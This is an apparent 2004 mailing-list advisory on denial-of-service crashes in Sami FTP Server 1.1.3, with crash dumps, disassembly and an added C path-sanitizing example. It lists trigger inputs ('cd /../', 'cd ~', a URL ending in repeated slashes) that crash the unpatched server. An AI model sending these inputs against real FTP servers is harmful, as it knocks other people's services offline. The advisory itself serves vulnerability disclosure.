Sami FTP Server 1.1.3 multiple vulnerabilities
Date: Fri, 13 Feb 2004 20:51:37 +0800
From: "intuit e.b." <[email protected]>
To: [email protected]
Subject: Sami FTP Server 1.1.3 multiple vulnerabilities
Application: Sami FTP Server
http://www.karja.com
Version: 1.1.3
Bug: multiple vulnerabilities (Denial Of Service)
Author: intuit
e-mail: [email protected]
web: rootshells.tk
greetz to: zigzag ;))
***********************************************************************
1. Description
2. The bug
3. The code
4. The fix
***********************************************************************
^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^
Vendor's Description:
"KarjaSoft's Sami brand of servers strives to provide small and powerful solutions, incorporated into the Plugin Management System. Focusing on simple configuration and small size, the Sami products still provide the functionality needed for either company or personal use. Sami FTP Server is designed to provide a fully functional FTP server, while still keeping the simplicity. With a few clicks you will be ready to share your files!"
***********************************************************************
^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^
(1) multiple vulnerabilities in the commands cd and get;
(2) requests of the form:
ftp://user:[email protected]/<two or more "/" characters>/
-----------------------------------------------------------------------
(1):
cd ~
cd /../
get <something unavailable>
(2):
ftp://user:[email protected]////
-----------------------------------------------------------------------
Each of these crashes pmsystem.exe with an error in the module samiftp.dll.
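The advisory does not name the root cause behind these crashes. As an added example for this post (not Sami FTP Server's code, and not a reconstruction of it), here is the kind of bounded virtual-path resolver an FTP server can run over the inputs listed above (`cd ~`, `cd /../`, a run of `/`), collapsing or refusing them before any file-system call; `resolve_ftp_path`, the fixed virtual root "/" and the treatment of `~` as that root are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define MAX_DEPTH 64

/* Canonicalize a client-supplied FTP path against a virtual root "/".
 * Returns 0 and writes the canonical path to out, or -1 if the request
 * is too long or a ".." would climb above the root.  Repeated "/" and
 * "." segments collapse; "~" is treated as the virtual home, "/".
 * Added example for this advisory, not Sami FTP Server's code. */
int resolve_ftp_path(const char *cwd, const char *req, char *out, size_t outsz)
{
    char buf[512];
    const char *segs[MAX_DEPTH];
    int depth = 0, i, n;
    size_t used = 0;
    char *tok;

    if (!cwd || !req || !out || outsz < 2) return -1;
    if (strcmp(req, "~") == 0) req = "/";

    /* Relative requests are joined onto cwd; absolute ones replace it. */
    n = (req[0] == '/') ? snprintf(buf, sizeof buf, "%s", req)
                        : snprintf(buf, sizeof buf, "%s/%s", cwd, req);
    if (n < 0 || (size_t)n >= sizeof buf) return -1;

    /* strtok skips empty fields, so "////" resolves like "/" and "a//b" like "a/b". */
    for (tok = strtok(buf, "/"); tok; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0) continue;
        if (strcmp(tok, "..") == 0) {
            if (depth == 0) return -1;   /* "/../": refuse to leave the root */
            depth--;
            continue;
        }
        if (depth == MAX_DEPTH) return -1;
        segs[depth++] = tok;
    }

    if (depth == 0) { strcpy(out, "/"); return 0; }
    out[0] = '\0';
    for (i = 0; i < depth; i++) {
        n = snprintf(out + used, outsz - used, "/%s", segs[i]);
        if (n < 0 || (size_t)n >= outsz - used) return -1;
        used += (size_t)n;
    }
    return 0;
}
```

With cwd "/pub", the requests "~" and "////" both resolve to "/", "/../" is rejected, and "docs/../readme.txt" becomes "/pub/readme.txt".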
***********************************************************************
^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^
(1):
The crash occurs here:
-----------------------------------------------------------------------
AppName: pmsystem.exe AppVer: 0.0.0.0 ModName: samiftp.dll
ModVer: 0.0.0.0 Offset: 0000ac53
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Registers:
EAX=00000000 EBX=00000002 ECX=00834AB4 EDX=00830608
ESI=00834AB4 EDI=00834AA8 EIP=008DAC53 ESP=0154FD48
EBP=0154FD70 EFL=00000202
CS=001B DS=0023 ES=0023 SS=0023 FS=0038 GS=0000
OV=0 UP=0 EI=1 PL=0 ZR=0 AC=0 PE=0 CY=0
00000008 = ????????
Code(Win XP Build 2600, Service Pack: None):
008DAC20 push esi
008DAC21 mov esi,ecx
008DAC23 mov eax,dword ptr [esi+8]
008DAC26 test eax,eax
008DAC28 je 008DAC44
008DAC2A mov eax,dword ptr [esi+4]
008DAC2D push eax
008DAC2E call 008DA288
008DAC33 add esp,4
008DAC36 mov dword ptr [esi+4],0
008DAC3D mov dword ptr [esi+8],0
008DAC44 mov ecx,8DAC70h
008DAC49 test ecx,ecx
008DAC4B je 008DAC62
008DAC4D mov eax,dword ptr [esp+8]
008DAC51 mov ecx,esi
008DAC53 mov edx,dword ptr [eax+8] <<< [crash]
008DAC56 mov eax,dword ptr [eax+4]
008DAC59 push edx
008DAC5A push 0
008DAC5C push eax
008DAC5D call 008DA9E0
008DAC62 mov eax,esi
008DAC64 pop esi
008DAC65 ret 4
(2):
The crash occurs here:
-----------------------------------------------------------------------
AppName: pmsystem.exe AppVer: 0.0.0.0 ModName: samiftp.dll
ModVer: 0.0.0.0 Offset: 000036c7
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Registers:
EAX=01000000 EBX=00835270 ECX=02F4FD2F EDX=05920007
ESI=0083BC90 EDI=02F4FD2F EIP=008D36C7 ESP=02F4FDAC
EBP=02F4FDF4 EFL=00000202
CS=001B DS=0023 ES=0023 SS=0023 FS=0038 GS=0000
OV=0 UP=0 EI=1 PL=0 ZR=0 AC=0 PE=0 CY=0
01000000 = ????????
Code(Win XP Build 2600, Service Pack: None):
008D36A5 je 008D36AD
008D36A7 mov eax,dword ptr [ecx]
008D36A9 push 1
008D36AB call dword ptr [eax]
008D36AD lea ecx,[ebp-2Ch]
008D36B0 call 008DA850
008D36B5 test ebx,ebx
008D36B7 je 008D36C1
008D36B9 mov eax,dword ptr [ebx]
008D36BB push 1
008D36BD mov ecx,ebx
008D36BF call dword ptr [eax]
008D36C1 mov eax,dword ptr [edi]
008D36C3 push 1
008D36C5 mov ecx,edi
008D36C7 call dword ptr [eax] <<< [crash]
008D36C9 lea ecx,[ebp-20h]
008D36CC call 008DA850
008D36D1 lea ecx,[ebp-14h]
008D36D4 call 008DA850
008D36D9 lea ecx,[ebp-38h]
008D36DC call 008DA850
008D36E1 pop edi
008D36E2 pop ebx
008D36E3 pop esi
008D36E4 leave
008D36E5 ret 4
-----------------------------------------------------------------------
/*Tested on: Win XP Build 2600, Service Pack: None
Win XP Build 2600, Service Pack: SP1 */
***********************************************************************
^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^
None exists.
***********************************************************************